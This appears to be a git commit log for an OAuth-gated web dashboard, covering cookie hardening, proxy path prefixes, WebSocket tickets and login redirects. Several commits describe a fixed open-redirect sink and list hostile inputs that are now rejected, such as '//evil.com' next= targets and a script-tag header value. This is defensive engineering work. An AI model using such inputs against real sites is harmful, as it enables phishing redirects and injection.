      SHADOW_DEFAULT. :active uses filter:invert(1), which matches the
      DS Button.

  Atmosphere
    - Subtle 3px dither (repeating-conic-gradient at 4% midground) +
      a midground radial glow at top — same idioms as the DS .dither
      utility and the SPA's panel chrome.
    - slide-up fade-in entrance animation matching DS @keyframes
      slide-up (0.6s ease-out). Honours prefers-reduced-motion.

  Brand wordmark
    - 'NOUS · RESEARCH' above the card in Rules Compressed, amber,
      0.32em tracking. Establishes ownership before the user squints
      at the buttons.

  Empty-state page
    - The 'Sign-in unavailable' fallback (no providers registered)
      got the same colour-token and typography treatment so the
      misconfigured-deploy experience is also coherent.

Fonts are served from /fonts/*.woff2 — a path the dashboard-auth gate
already allowlists pre-auth (see _GATE_PUBLIC_PREFIXES in
middleware.py:42), so the login page renders with the brand typeface
without needing the React bundle loaded. The page is still entirely
static HTML+CSS with no JS — the original constraint (no SPA
dependency, no session token) is preserved.

The class="provider-btn" selector is unchanged — the existing test
suite extracts the anchor href via that class, and a regression that
renamed it would silently break tests/hermes_cli/test_dashboard_auth_401_reauth.py.
A docstring note on the module flags this so future visual tweaks
don't break the contract by accident.

Visual smoke-test: rendered both the happy path (multiple providers
listed) and the empty-state page in a browser and verified all five
DS criteria — brown-black bg, amber accent, uppercase wide-tracking
type, inset-bevel buttons, Nous · Research wordmark — render
correctly with no unstyled fallbacks. 208/208 dashboard-auth tests
remain green.
2026-05-27 02:12:27 -07:00
Ben 61dcc33893 feat(dashboard-auth): config.yaml as canonical surface for dashboard.oauth
Per AGENTS.md, ~/.hermes/.env is reserved for API keys / secrets and
config.yaml is the surface for non-secret configuration. The Nous
Portal plugin previously read HERMES_DASHBOARD_OAUTH_CLIENT_ID and
HERMES_DASHBOARD_PORTAL_URL from the environment only, which forced
local-dev / on-prem operators to put non-secret per-instance
configuration in .env — violating the convention.

Add dashboard.oauth.{client_id,portal_url} to DEFAULT_CONFIG and have
the plugin resolve each setting with env-overrides-config precedence:

  1. Env var when set to a non-empty value (Fly.io platform-secret
     injection — what pushes per-deploy client_ids without baking
     them into the image).
  2. config.yaml entry (canonical surface for local dev / on-prem).
  3. Plugin default (no provider registered when client_id is empty;
     portal_url defaults to https://portal.nousresearch.com).

Empty env values are explicitly treated as unset so a provisioned-but-
not-populated Fly secret can't accidentally shadow a valid config.yaml
entry with an empty string — operators would otherwise lose the gate.

Implementation:

  - hermes_cli/config.py: add dashboard.oauth.{client_id,portal_url}
    block to DEFAULT_CONFIG with full doc comment explaining the
    override precedence and Fly.io rationale.
  - plugins/dashboard_auth/nous/__init__.py: add _load_config_oauth_section,
    _resolve_client_id, _resolve_portal_url helpers; replace the two
    direct os.environ.get() calls in register() with the resolvers.
    Update the skip-reason string to mention BOTH surfaces so an
    operator looking at the fail-closed bind error knows config.yaml
    is a valid alternative to the env var.
  - plugins/dashboard_auth/nous/plugin.yaml: update description to
    name both surfaces. requires_env stays pointing at the env var
    name — it's metadata-only (not used by the plugin loader for
    gating) so this is documentation/UX, not enforcement.
  - cli-config.yaml.example: append commented dashboard.oauth block
    with the same override rationale operators see in code.
  - website/docs/user-guide/features/web-dashboard.md: rewrite the
    'Default provider: Nous Research' section to lead with config.yaml,
    present env vars as operator overrides (Fly.io's primary path).
    Updated the example fail-closed bind error to match the new
    skip-reason text.

Test coverage — new TestConfigYamlSource class (8 tests) pinning
every tier of the precedence chain:

  - config-yaml-only path registers correctly
  - both config-yaml fields (client_id + portal_url) honoured
  - env var overrides config for client_id (Fly.io critical path)
  - env var overrides config for portal_url
  - empty env string does NOT shadow config (CI/Fly edge case)
  - neither source set → skip with reason mentioning BOTH surfaces
  - load_config() raising falls through to env-only path (resilience)
  - non-dict oauth section falls through cleanly (typo resilience)

Mutation-tested: flipping the precedence to config-wins-over-env trips
exactly test_env_overrides_config_client_id while the other 7 stay
green, confirming the suite discriminates the order, not just the
sources.

This closes the last item in Teknium's PR review (PR #30156).
2026-05-27 02:12:27 -07:00
Ben e2a92ce649 chore: gitignore .hermes/ working directory; drop tracked plan artifact
The 4533-line dashboard-OAuth plan was checked into .hermes/plans/
during initial development. .hermes/ is the Hermes Agent's runtime
working directory (logs, session caches, in-flight plans) — its
contents are never artifacts of the codebase and should not have been
tracked.

Add .hermes/ to .gitignore so future agent runs that materialise
plans/audits/cache files in the working tree don't accidentally stage
them. Remove the existing plan file from version control.

The plan content is preserved in the branch history if anyone needs to
reference it.
2026-05-27 02:12:27 -07:00
Ben b26d81d536 feat(dashboard-auth): honour X-Forwarded-Prefix + __Host-/__Secure- cookies
Mission-control style deploys reverse-proxy the dashboard at a path
prefix (e.g. mission-control.tilos.com/hermes/* -> :9119) and inject
X-Forwarded-Prefix: /hermes on every request. The SPA mount already
honoured this for asset URLs and the bootstrap __HERMES_BASE_PATH__,
but the OAuth gate didn't:

  1. The gate's Location: header to /login and the 401 envelope's
     login_url were built bare ("/login?next=..."). Under a /hermes
     prefix the browser follows that to mission-control.tilos.com/login
     which the proxy doesn't route to the dashboard.
  2. _redirect_uri (the OAuth callback URL handed to the IDP) used
     request.url_for(), which doesn't honour X-Forwarded-Prefix
     (Starlette/uvicorn's proxy_headers only handles Host + Proto +
     For). The IDP redirects back to /auth/callback instead of
     /hermes/auth/callback → 404 in the user's browser.
  3. Cookies were set with Path=/ which leaks them to other apps on
     the same origin and won't be sent back on requests under the
     prefix in the first place.

Fix threads the normalised prefix through every boundary:

  * New hermes_cli/dashboard_auth/prefix.py — single source of truth
    for X-Forwarded-Prefix parsing. web_server._normalise_prefix
    becomes a re-export so the SPA mount, the gate, and the cookies
    helper all agree.
  * middleware._unauth_response builds login_url = f"{prefix}/login".
  * routes._redirect_uri splices the prefix into the path component
    of the IDP-bound URL (with full validation of the header).
  * cookies.{set,clear}_{session,pkce}_cookie now take prefix="".
    The Path attribute switches to /hermes when a prefix is set, and
    the cookie name switches variant (see below). Every caller passes
    the request's normalised prefix.

Cookie hardening (Teknium's lesser-note #1 in the PR review): adopt
the __Host- / __Secure- cookie name prefixes per draft-west-cookie-
prefixes. The variant is selected from (use_https, prefix):

  * Loopback HTTP → bare "hermes_session_at" (both prefixes require
    Secure, incompatible with HTTP).
  * HTTPS, direct deploy (Path=/) → "__Host-hermes_session_at".
    Strongest spec: bound to exact origin, no Domain attribute, Secure
    required.
  * HTTPS, behind a proxy prefix (Path=/hermes) →
    "__Secure-hermes_session_at". __Host- forbids Path != "/"; the
    explicit Path=/hermes covers same-origin app isolation.

Setter and reader BOTH consult the prefix because the cookie *name*
changes — a reader that looked up the bare name when the setter wrote
__Secure- would never find the value. The reader falls back across
all three variants so a request whose shape changed mid-session (e.g.
post-deploy from no-prefix to /hermes) still picks up the existing
cookie until it expires.
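
The (use_https, prefix) selection above can be sketched like this. The
helper names are illustrative, not the ones in cookies.py, and the
reader's lookup order (expected name first, then the other variants) is
an assumption:

```python
from typing import Mapping, Optional

BASE_NAME = "hermes_session_at"


def session_cookie_name(use_https: bool, prefix: str = "", base: str = BASE_NAME) -> str:
    """Pick the cookie name variant for a given request shape."""
    if not use_https:
        return base  # both prefixes require Secure, so plain HTTP stays bare
    if prefix:
        return f"__Secure-{base}"  # __Host- forbids Path != "/"
    return f"__Host-{base}"


def cookie_path(prefix: str = "") -> str:
    """Scope the cookie to the proxy prefix when there is one."""
    return prefix or "/"


def read_session_cookie(
    cookies: Mapping[str, str], use_https: bool, prefix: str = "", base: str = BASE_NAME
) -> Optional[str]:
    """Try the expected variant first, then fall back across the others."""
    expected = session_cookie_name(use_https, prefix, base)
    for name in (expected, f"__Host-{base}", f"__Secure-{base}", base):
        if name in cookies:
            return cookies[name]
    return None
```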

Test coverage:

  - tests/hermes_cli/test_dashboard_auth_prefix.py — new file. 11 tests
    pinning:
      • Location: /hermes/login on the gate's HTML redirect
      • 401 envelope login_url carries the prefix
      • Malformed X-Forwarded-Prefix is ignored (header-injection
        defence; the script-tag value is normalised to empty string)
      • _redirect_uri splices /hermes into the path (the property
        that prevents the IDP-returns-to-404 failure)
      • PKCE cookie uses Path=/hermes + __Secure- when proxied
      • Session cookies use __Host- when direct, __Secure- when
        proxied, bare on loopback HTTP
      • End-to-end round trip with hand-managed PKCE cookie carriage
        (TestClient can't simulate a Path=/hermes cookie automatically)
  - tests/hermes_cli/test_dashboard_auth_cookies.py — rewritten to pin
    each (use_https, prefix) shape produces its expected cookie name,
    plus reader-side coverage that __Host- and __Secure- variants are
    both recognised.
  - Existing tests across middleware / 401-reauth / etc. updated to
    match the new cookie names (substring contains instead of
    startswith).

Mutation-tested: reverting _unauth_response to build the bare
"/login" URL trips exactly the two tests that pin the prefix
carriage, confirming the suite discriminates the regression.
2026-05-27 02:12:27 -07:00
Ben 034ad95fed fix(dashboard-auth): propagate next= through login page + PKCE cookie
The gate's _unauth_response set next=<path> on the /login redirect URL,
but nothing downstream read it: render_login_html ignored next=,
auth_login dropped it, and auth_callback read next= from its own query
string — which an IDP never sets on the callback URL (real IDPs only
echo back code+state). The _validate_post_login_target plumbing in the
callback was unreachable on the happy path, so users always landed on
"/" regardless of what they originally requested.

Worse: reading next= from the callback URL was a latent open-redirect
sink, since an attacker could craft /auth/callback?...&next=/admin and
have the server honour it post-auth.

Fix carries next= through the round trip on a server-controlled channel:

  1. login_page reads request.query_params['next'] and passes it (post-
     validation) to render_login_html.
  2. render_login_html threads next= URL-encoded into each provider
     button's href, with HTML-attribute escaping as defence in depth.
  3. auth_login accepts ?next= as a query param, re-validates, and
     appends it as a fourth segment (next=<urlquoted>) in the PKCE
     cookie payload alongside provider/state/verifier.
  4. auth_callback no longer accepts a next: str = "" query param. It
     parses next= out of the PKCE cookie and validates that with the
     same same-origin rules. Any attacker-supplied ?next= on the
     callback URL is silently ignored — server-only carrier.
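
To make step 3 and step 4 concrete, here is one way a four-segment
payload could be encoded and parsed. The "|" separator and both helper
names are hypothetical; the log only states that next= travels as a
URL-quoted fourth segment alongside provider/state/verifier:

```python
from typing import Tuple
from urllib.parse import quote, unquote

SEPARATOR = "|"  # assumed; the real framing is not shown in this log


def encode_pkce_payload(provider: str, state: str, verifier: str, next_path: str = "") -> str:
    """Join the PKCE fields, appending next= only when a target was requested."""
    segments = [provider, state, verifier]
    if next_path:
        # safe="" also quotes "/" and the separator itself.
        segments.append("next=" + quote(next_path, safe=""))
    return SEPARATOR.join(segments)


def decode_pkce_payload(payload: str) -> Tuple[str, str, str, str]:
    """Split the payload; a missing fourth segment yields next_path == ""."""
    parts = payload.split(SEPARATOR)
    if len(parts) not in (3, 4):
        raise ValueError("malformed PKCE cookie payload")
    provider, state, verifier = parts[:3]
    next_path = ""
    if len(parts) == 4 and parts[3].startswith("next="):
        next_path = unquote(parts[3][len("next="):])
    return provider, state, verifier, next_path
```

The decoded next_path is still untrusted input at this point and would
go through the same same-origin validation before any redirect.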

Test coverage adds three classes:

  - TestAuthCallbackNext drives /login → /auth/login → IDP-bounce →
    /auth/callback end-to-end without smuggling next= onto the callback
    URL (which is what the previous tests did and why they didn't
    catch the bug). Includes test_attacker_callback_next_param_is_ignored
    to pin the security property that the URL value is never read.
  - TestRenderLoginHtmlNext covers the rendering function at the
    unit boundary so a regression that drops next_path is caught
    without spinning up the full app.
  - TestAuthLoginPkceCookieNext inspects the Set-Cookie header on
    /auth/login responses so a regression in cookie encoding is caught
    without driving the full round trip.

Mutation-tested: reverting auth_callback to read next= from the URL
trips 3 of 6 TestAuthCallbackNext tests (the safe-path and attacker-
hardening ones), confirming the suite discriminates between the cookie
read and the URL read.
2026-05-27 02:12:27 -07:00
Ben c3104195b8 fix(dashboard-auth): bypass loopback WS peer check in gated mode
When the OAuth gate is active, start_server runs uvicorn with
proxy_headers=True so the dashboard can honour X-Forwarded-Proto from
Fly's TLS terminator (cookies, redirect URI reconstruction). A side
effect: ws.client.host is rewritten to the X-Forwarded-For value, which
on Fly is the real internet client IP — never loopback. The loopback
peer guard in _ws_client_is_allowed then rejected every WS upgrade in
gated mode (4403 close) even after a successful OAuth round trip and
ticket consumption, silently breaking /api/pty, /api/ws, /api/pub, and
/api/events.

Fix: in gated mode, bypass the peer-IP check. The OAuth gate +
single-use ticket is the auth. The Host/Origin guard in
_ws_host_origin_is_allowed still runs and is what protects against
DNS-rebinding here, not the peer IP.
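
The resulting decision can be summarised in a small sketch. The function
signature is hypothetical (the real helpers take the WebSocket object),
and ticket validation is assumed to happen elsewhere:

```python
import ipaddress


def is_loopback(host: str) -> bool:
    """True for 127.0.0.0/8, ::1, or the literal name localhost."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"


def ws_request_is_allowed(peer_host: str, host_origin_ok: bool, auth_required: bool) -> bool:
    """Combine the Host/Origin guard with the mode-dependent peer check."""
    if not host_origin_ok:
        return False  # DNS-rebinding guard runs in both modes
    if auth_required:
        return True  # gated mode: OAuth gate + single-use ticket is the auth
    return is_loopback(peer_host)  # loopback mode: keep LAN hosts out
```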

Loopback mode behaviour is unchanged: the legacy ?token= path is the
only auth there and we don't want LAN hosts guessing tokens.

Regression coverage: TestWsRequestIsAllowedGated pins all four
behaviours — non-loopback peer allowed in gated mode, non-loopback peer
rejected in loopback mode, loopback peer allowed in loopback mode, and
the Host/Origin guard still firing on a rebinding attempt with gated
mode + matching peer.
2026-05-27 02:12:27 -07:00
Ben 866cc988b5 fix(dashboard-auth): use fixed-length sig suffix in stub token framing
The stub auth provider's _sign/_unsign helpers joined payload and HMAC
with a 'b"."' separator and recovered the parts via bytes.rsplit. HMAC-SHA256
digests are random bytes, so ~12% of the time the digest contains 0x2E
('.') and rsplit picks the wrong split point -- HMAC verification then
spuriously rejects valid tokens.

test_stub_refresh_round_trips was failing ~25% of the time in isolation
because of this.

Switch to a fixed-length suffix (32 bytes, sliced off in _unsign): no
separator means no collision class. After the fix, 10/10 runs pass.
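
For illustration, fixed-length framing along these lines avoids the
separator entirely. This is a sketch with assumed names and signatures,
not the stub provider's actual helpers:

```python
import hashlib
import hmac
from typing import Optional

SIG_LEN = hashlib.sha256().digest_size  # 32 bytes for HMAC-SHA256


def sign(payload: bytes, key: bytes) -> bytes:
    """Append the raw HMAC-SHA256 digest to the payload, with no separator."""
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def unsign(token: bytes, key: bytes) -> Optional[bytes]:
    """Slice off the last SIG_LEN bytes and verify them in constant time."""
    if len(token) < SIG_LEN:
        return None
    payload, sig = token[:-SIG_LEN], token[-SIG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return payload if hmac.compare_digest(sig, expected) else None
```

Because the split point depends only on the token length, a 0x2E byte
inside the digest (or inside the payload) can no longer move it.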
2026-05-27 02:12:27 -07:00
Ben c598076b76 test(dashboard-auth): strip HERMES_DASHBOARD_OAUTH_* env vars in hermetic fixture
When these vars are set in the developer's shell, every /api/status call
triggers load_gateway_config() -> discover_plugins() -> the bundled
dashboard_auth/nous plugin auto-registers itself, leaking a provider into
the registry across tests on the same xdist worker. That breaks assertions
like 'auth_providers == []' (loopback) and '== ["stub"]' (gated) in
test_dashboard_auth_status_endpoint.py.

CI never has these set, so this only surfaced locally -- exactly the
hermeticity gap _hermetic_environment is meant to close. Add them to
_HERMES_BEHAVIORAL_VARS so the autouse fixture strips them, and to the
unset list in scripts/run_tests.sh as belt-and-suspenders for direct
pytest invocations.
2026-05-27 02:12:27 -07:00
Ben a498485631 feat(dashboard-auth-nous): surface token iss/aud in verification-failure error
When jwt.decode raises InvalidTokenError, decode the token a second time
without signature verification (safe — we never trust the values, just
display them) and append the actual iss/aud claims plus our configured
expected values to the error message. Lets operators see config drift
between HERMES_DASHBOARD_PORTAL_URL / HERMES_DASHBOARD_OAUTH_CLIENT_ID
and what Portal is actually emitting without having to hand-decode the
JWT from the browser cookie.
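
The diagnostic step can be sketched with the standard library alone.
The commit itself goes through PyJWT (where signature checking can be
switched off via options={"verify_signature": False}); the helper names
and message wording below are assumptions:

```python
import base64
import json


def unverified_claims(token: str) -> dict:
    """Decode the JWT payload WITHOUT verifying it. For display only."""
    try:
        payload_b64 = token.split(".")[1]
        padded = payload_b64 + "=" * (-len(payload_b64) % 4)
        claims = json.loads(base64.urlsafe_b64decode(padded))
    except (IndexError, ValueError):
        return {}
    return claims if isinstance(claims, dict) else {}


def describe_claim_mismatch(token: str, expected_iss: str, expected_aud: str) -> str:
    """Build the suffix appended to the verification-failure error."""
    claims = unverified_claims(token)
    return (
        f"token iss={claims.get('iss')!r} aud={claims.get('aud')!r}; "
        f"expected iss={expected_iss!r} aud={expected_aud!r}"
    )
```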
2026-05-27 02:12:27 -07:00
Ben 42729775db fix(dashboard): trigger plugin discovery in cmd_dashboard before start_server
The argparse-setup plugin discovery path is gated on
_plugin_cli_discovery_needed(), which returns False for any built-in
subcommand including 'dashboard' (to save ~500ms startup on hot paths
like --tui). As a result, plugins/dashboard_auth/nous never registered
its DashboardAuthProvider, and start_server's fail-closed gate check
tripped for any non-loopback bind even when the Nous provider was
bundled and ready to run.

Call discover_plugins() explicitly in cmd_dashboard so the provider
registry is populated before the gate check runs. discover_plugins() is
idempotent (per its docstring), so this is safe to call regardless of
whether the argparse path already ran it.
2026-05-27 02:12:27 -07:00
Ben b3dc539304 feat(dashboard-auth): Nous plugin always-on; default portal URL; specific error messages
The Nous OAuth provider plugin (plugins/dashboard_auth/nous) is bundled
and auto-loaded — same as before — but previously refused to register
unless BOTH HERMES_DASHBOARD_OAUTH_CLIENT_ID and HERMES_DASHBOARD_PORTAL_URL
were set, then the gate's fail-closed branch told the operator 'install
the default Nous provider'. That message is misleading: the provider IS
installed; it's just unconfigured. And the contract only really needs
the per-instance client_id — the portal URL is the same for everyone
in production.

Three changes:

1. plugins/dashboard_auth/nous/__init__.py:
   - HERMES_DASHBOARD_PORTAL_URL is now optional and defaults to
     'https://portal.nousresearch.com'. Override only for staging
     (portal.rewbs.uk) or a custom deployment. Empty string also
     falls back to the default so an empty Fly secret can't point
     the dashboard at nowhere.
   - Plugin exposes a module-level LAST_SKIP_REASON: str that the gate
     reads when no providers register. Cleared on each register() call.
     Skip reasons are human-readable and actionable
     ('HERMES_DASHBOARD_OAUTH_CLIENT_ID is not set. The Nous Portal
     provisions this env var…').

2. plugins/dashboard_auth/nous/plugin.yaml:
   - requires_env drops HERMES_DASHBOARD_PORTAL_URL; only the client_id
     is mandatory. Description updated to reflect this.

3. hermes_cli/web_server.py:
   - When the gate fail-closes for 'no providers', it now reads each
     bundled plugin's LAST_SKIP_REASON and embeds them in the SystemExit
     message. Operator sees the specific config fix needed:
       Bundled providers reported these issues:
         • nous: HERMES_DASHBOARD_OAUTH_CLIENT_ID is not set. …
     instead of the prior generic 'Install the default Nous provider'.

Tests:
  - TestPluginRegister rewritten to assert the new defaults +
    LAST_SKIP_REASON contents (6 tests, +1 new for empty-string env).
  - New gate test test_start_server_surfaces_nous_skip_reason_when_unconfigured.
  - test_get_method_is_not_allowed widened to handle the SPA-shell 200
    path explicitly — assertion now verifies no JSON ticket leaks
    rather than asserting a specific status code (covers all four of
    401/404/405/200).

Docs updated: web-dashboard.md's 'Default provider' section now shows
the env-var table with required/optional columns and embeds the
fail-closed error message verbatim so operators can match what they
see at the prompt.
2026-05-27 02:12:27 -07:00
Ben af3d4a687f fix(dashboard-auth): ChatPage cleanup closes WS via wsRef.current
Phase 5.3 (1c99c2f5e) wrapped the WS construction in an IIFE so the
gated-mode ticket fetch could resolve asynchronously, but the effect's
top-level cleanup still referenced the IIFE-scoped `const ws`. TypeScript
catches it at build time:

  src/pages/ChatPage.tsx:654:7 - error TS2304: Cannot find name 'ws'.

LSP-cache-lag drowned the diagnostic under the JSX-types-missing noise
locally, so the bug shipped uncaught. Switch to `wsRef.current?.close()`
which:

  - resolves to the same WebSocket the IIFE assigned (line 562:
    `wsRef.current = ws`)
  - is null-safe when unmount races the ticket fetch (the IIFE early-
    returns on `unmounting` so wsRef.current is never set)

The ChatSidebar.tsx + gatewayClient.ts cleanup paths were already using
this pattern correctly (`ws?.close()` / `ws` was hoisted), so this fix
is ChatPage-only.
2026-05-27 02:12:27 -07:00
Ben 7c9cdbc093 docs(dashboard-auth): Phase 7 — OAuth Authentication section in web-dashboard.md
Adds an 'OAuth Authentication (gated mode)' section to the existing web
dashboard docs, slotted just before the CORS section so readers
encounter it after the REST API reference. Covers:

  - When the gate engages (decision table for --host / --insecure
    combinations).
  - Fail-closed semantics if no provider is registered.
  - Bundled Nous provider, env-var contract, Portal provisioning.
  - Full OAuth dance (link to nous-account-service contract doc) — auth
    code + PKCE S256, JWKS verification, 15-min token TTL, no refresh
    token in V1.
  - Cookies set (hermes_session_at + hermes_session_pkce; mentions the
    deprecated hermes_session_rt slot).
  - Logout flow, audit log path, redacted fields.
  - Custom provider plugin recipe with the DashboardAuthProvider ABC.
  - Verification recipe: env vars + /api/status curl.

The docs follow the existing web-dashboard.md style (option tables,
ASCII flow diagrams, curl examples). No frontmatter/sidebar position
changes — the section is appended in place.
2026-05-27 02:12:27 -07:00
Ben 2fc4615fc4 feat(dashboard-auth): Phase 7 — SPA AuthWidget + /api/status auth fields
Phase 7 surfaces the OAuth gate state to users.

web/src/components/AuthWidget.tsx (new):
  Sidebar widget that fetches /api/auth/me on mount and renders a
  compact 'Logged in as <user_id…> via <provider>' row with a logout
  icon. Contract V1 (Nous Portal) emits no email/display_name claims,
  so user_id is the display value (truncated to 14 chars + ellipsis);
  display_name and email fallthroughs are forward-compat for OQ-C1.
  Renders nothing on 401 from /api/auth/me — that's the signal the
  gate isn't engaged (loopback mode), in which case the widget would
  be confusing.
  Logout POSTs /auth/logout (which clears cookies + redirects to
  /login) then full-page-navigates to /login itself; the SPA's fetch
  wrapper doesn't follow that redirect, so the navigation is explicit.

web/src/App.tsx: mounts <AuthWidget /> above <SidebarFooter />.
  Component is self-hiding in loopback mode so there's no need for a
  conditional mount.

web/src/lib/api.ts:
  - getAuthMe() + logout() helpers
  - AuthMeResponse type
  - StatusResponse gets optional auth_required + auth_providers fields
    so the existing StatusPage can render a gated/loopback badge.

hermes_cli/web_server.py: /api/status payload now includes
  - auth_required: bool — whether app.state.auth_required is True
  - auth_providers: list[str] — registered DashboardAuthProvider names
  Lazy-imports list_providers so early-startup status calls don't
  crash if the dashboard_auth module is still being set up.

tests/hermes_cli/test_dashboard_auth_status_endpoint.py: 3 new tests
covering the new status fields in both gated and loopback modes plus
a regression that no existing field got dropped from the payload.

The hermes status CLI is unchanged in this commit — that command
tracks model providers + OAuth credentials, not running-dashboard
state. The /api/status endpoint is the canonical place to query
dashboard auth-gate state, consumed by the React StatusPage already.
2026-05-27 02:12:27 -07:00
Ben 5e9308b5b8 feat(dashboard-auth): Phase 6 — 401 re-auth envelope + next= propagation
Contract V1 of nous-account-service PR #180 ships no refresh tokens, so
the original Phase 6 silent-refresh design is replaced with a thinner
'401 → redirect to /login' UX. The dashboard's gated middleware now
emits a structured envelope on any auth failure; the SPA's fetch
wrapper sees it and full-page-navigates the user through re-auth.

hermes_cli/dashboard_auth/cookies.py:
  set_session_cookies(refresh_token='') SKIPS writing the
  hermes_session_rt cookie. Forward-compat: a non-empty refresh_token
  still emits the cookie unchanged, so a future Portal contract that
  starts issuing RTs flips the persistence on with no other change.
  clear_session_cookies still emits a Max-Age=0 deletion for the RT
  cookie so stale cookies from earlier deployments get flushed on
  logout / session expiry. Deprecation marker + rationale in
  module docstring per the user's docstring-only deprecation pattern.

hermes_cli/dashboard_auth/middleware.py:
  _unauth_response now builds a structured JSON envelope for API 401s:
    { error: 'session_expired' | 'unauthenticated',
      detail: 'Unauthorized',
      reason: <internal>,
      login_url: '/login?next=<safe-path>' }
  HTML redirects also carry next= so a user landing on /sessions
  without a cookie bounces back to /sessions after re-auth.
  _safe_next_target validates same-origin: drops protocol-relative
  paths (//evil.com), absolute URLs, and any /login or /auth/* loop.
  Dead cookies are cleared on the 401 path so the browser stops
  replaying invalid tokens.
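
  A minimal sketch of the same-origin rules and the resulting login_url,
  assuming rejected targets fall back to "/" (names without the leading
  underscore are illustrative, not the middleware's own):

```python
from urllib.parse import quote


def safe_next_target(path: str) -> str:
    """Return a same-origin path to resume at, or "/" when the input is unsafe."""
    if not path or not path.startswith("/"):
        return "/"  # absolute URLs and relative junk
    if path.startswith("//"):
        return "/"  # protocol-relative, e.g. //evil.com
    bare = path.split("?", 1)[0]
    for loop_root in ("/login", "/auth"):
        if bare == loop_root or bare.startswith(loop_root + "/"):
            return "/"  # would bounce the user straight back into the flow
    return path


def login_url(requested_path: str) -> str:
    """Build the login_url carried in the 401 envelope and HTML redirect."""
    return "/login?next=" + quote(safe_next_target(requested_path), safe="")
```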

hermes_cli/dashboard_auth/routes.py:
  /auth/callback accepts next= query param and validates via
  _validate_post_login_target (same rules as the gate's
  _safe_next_target — defence-in-depth because next= survived a full
  IDP round trip and attacker-controlled state can re-enter via the
  callback URL). Open-redirect attempts land at '/' instead.

web/src/lib/api.ts:
  fetchJSON parses the 401 envelope and full-page-navigates to
  body.login_url ONLY on the known session-expiry error codes.
  Domain-level 401s (e.g. permission errors) bubble up as regular
  errors. credentials: 'include' added so cookie auth works for all
  fetches routed through this wrapper. sessionStorage.lastLocation is
  preserved for future use by AuthWidget / hermes_status.

Test files are marked with pytest.mark.xdist_group so that the four files
that mutate web_server.app.state.auth_required serialize onto the same
xdist worker, which eliminates 'works locally, fails in CI' app-state bleed.

20 new tests in test_dashboard_auth_401_reauth.py:
  - set_session_cookies(refresh_token='') skips RT cookie
  - clear_session_cookies still emits RT deletion
  - 401 envelope shape (unauthenticated vs session_expired)
  - dead cookie cleared on invalid-token 401
  - login_url carries next= for deep paths
  - login loop avoided when path is /login/auth/api-auth
  - protocol-relative URL rejected
  - _safe_next_target unit tests (accept same-origin, reject loops/abs)
  - /auth/callback respects safe next= but rejects open redirects

2 pre-existing tests updated to accept the new /login?next=%2F shape.

Full dashboard-auth suite: 168 passed, 1 skipped (Phase 0 pre-existing).
2026-05-27 02:12:27 -07:00
Ben 8971e94831 feat(dashboard-auth): SPA WS auth — getWsTicket() + buildWsAuthParam()
Phase 5 task 5.3. The dashboard's three WS-using surfaces (ChatPage,
gatewayClient, ChatSidebar) previously hardcoded ?token=<session>. In
gated mode the server rejects that path; the SPA must mint a single-use
ticket via POST /api/auth/ws-ticket and pass ?ticket= on the upgrade.

web/src/lib/api.ts: adds getWsTicket() (POST /api/auth/ws-ticket with
credentials: 'include') and buildWsAuthParam() — a helper that returns
['ticket', <minted>] in gated mode and ['token', <session>] in loopback.
Window.__HERMES_AUTH_REQUIRED__ is read from the server-injected
bootstrap script and toggles the path. Documented as the bridge from
cookie auth (REST) to WS auth.

web/src/pages/ChatPage.tsx: buildWsUrl() now takes an [authName, authValue]
pair instead of a bare token. The WS construct is wrapped in an IIFE so
the outer effect can stay synchronous (the cleanup returns the effect's
disposer at top level). onDataDisposable + onResizeDisposable hoisted to
`let` bindings the cleanup closes over.

web/src/lib/gatewayClient.ts: connect() branches on
window.__HERMES_AUTH_REQUIRED__ before opening /api/ws. Explicit token
overrides win (test-only path); otherwise gated → fetch ticket, loopback
→ use injected session token.

web/src/components/ChatSidebar.tsx: events-feed WS opens through the
same IIFE pattern as ChatPage. The ws local is hoisted so the cleanup's
ws?.close() works after the async mint resolves.

Server side already injects window.__HERMES_AUTH_REQUIRED__ in
_serve_index (Phase 3.5).
2026-05-27 02:12:27 -07:00
Ben b2360ba44e feat(dashboard-auth): _ws_auth_ok helper + ticket auth on all 4 WS endpoints
Phase 5 task 5.2. Four WebSocket endpoints — /api/pty, /api/ws, /api/pub,
/api/events — previously authed with the same constant-time check against
`_SESSION_TOKEN`. Replaced with a single helper that branches on
`app.state.auth_required`:

  Loopback / --insecure: legacy ?token=<_SESSION_TOKEN> path (unchanged).
  Gated:                  ?ticket=<single-use> consumed against the
                          dashboard-auth ticket store.

Critical security property: gated mode UNCONDITIONALLY rejects the
?token= path. A leaked _SESSION_TOKEN value from a log line is not
replayable for WS access in gated deployments.
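
A rough sketch of the branching described above, assuming the query string has already been parsed into a dict and that ticket consumption raises on failure. The name `ws_auth_ok`, its parameters, and the injected `consume_ticket` callable are hypothetical; the real helper reads `app.state.auth_required` and `_SESSION_TOKEN` directly.

```python
import hmac
from typing import Callable, Mapping


# Hypothetical signature; illustrates the gated vs. loopback split only.
def ws_auth_ok(
    query: Mapping[str, str],
    auth_required: bool,
    session_token: str,
    consume_ticket: Callable[[str], object],
) -> bool:
    if auth_required:
        # Gated mode: ?token= is never consulted, only ?ticket=.
        ticket = query.get("ticket")
        if not ticket:
            return False
        try:
            consume_ticket(ticket)  # assumed to raise if unknown, used, or expired
        except Exception:
            return False
        return True
    # Loopback / --insecure: legacy constant-time token comparison.
    token = query.get("token", "")
    return bool(token) and hmac.compare_digest(
        token.encode(), session_token.encode()
    )
```

Because the gated branch returns before the token is ever read, a leaked session token cannot be replayed there, which is the property the commit calls out.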

`_build_sidecar_url` now branches too: loopback uses the legacy token;
gated mode mints a server-internal ticket via mint_ticket() with
pseudo-user 'pty-sidecar' / provider 'server-internal' so audit logs can
distinguish PTY-internal sidecar tickets from browser tickets. PTY
children open /api/pub exactly once at startup so single-use suffices.

Ticket rejections audit-log as WS_TICKET_REJECTED with truncated reason
+ client IP + WS path. Operators debugging 'WS keeps closing' issues see
which endpoint and why.

17 new tests:
- POST /api/auth/ws-ticket: 200 with cookie, 401/302 without, distinct
  per call, GET-not-allowed.
- _ws_auth_ok loopback: token accept/reject, missing-token reject,
  ticket-param-ignored.
- _ws_auth_ok gated: ticket accept, single-use rejection, unknown reject,
  legacy-token-rejected-in-gated assertion, audit-log emission.
- _build_sidecar_url: loopback uses token=, gated uses ticket=, no-bound
  returns None.
2026-05-27 02:12:27 -07:00
